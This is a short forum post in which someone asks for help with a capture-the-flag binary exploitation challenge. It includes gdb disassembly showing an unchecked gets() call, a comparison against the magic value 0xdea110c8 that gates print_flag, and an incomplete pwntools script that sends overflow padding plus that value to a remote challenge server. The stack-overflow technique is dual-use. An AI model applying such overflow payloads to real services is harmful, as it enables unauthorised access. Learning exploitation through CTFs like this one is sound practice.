Hello i've a problem to solve, a binary exploitation
this is my output gdb
0x004008a6 <+301>: lea eax,[ebp-0x3b]0x004008a9 <+304>: push eax0x004008aa <+305>: call 0x400520 <gets@plt>0x004008af <+310>: add esp,0x100x004008b2 <+313>: cmp DWORD PTR [ebp-0x10],0xdea110c80x004008b9 <+320>: jne 0x4008c2 <main+329>0x004008bb <+322>: call 0x4006fd <print_flag>0x004008c0 <+327>: jmp 0x4008d4 <main+347>
this is my program in python
from pwn import *r = remote("***************.com", 4321)payload = "A"*i + "\xc8\x10\xa1\xde"r.send("Sir Lancelot of Camelot\n")print r.recv(4096)r.send("To seek the Holy Grail.\n")print r.recv(4096)r.send(payload)print r.recv(4096)
My goal is to jump the comparaison to access the function witch print the flag
some advise or help are welcome
thanks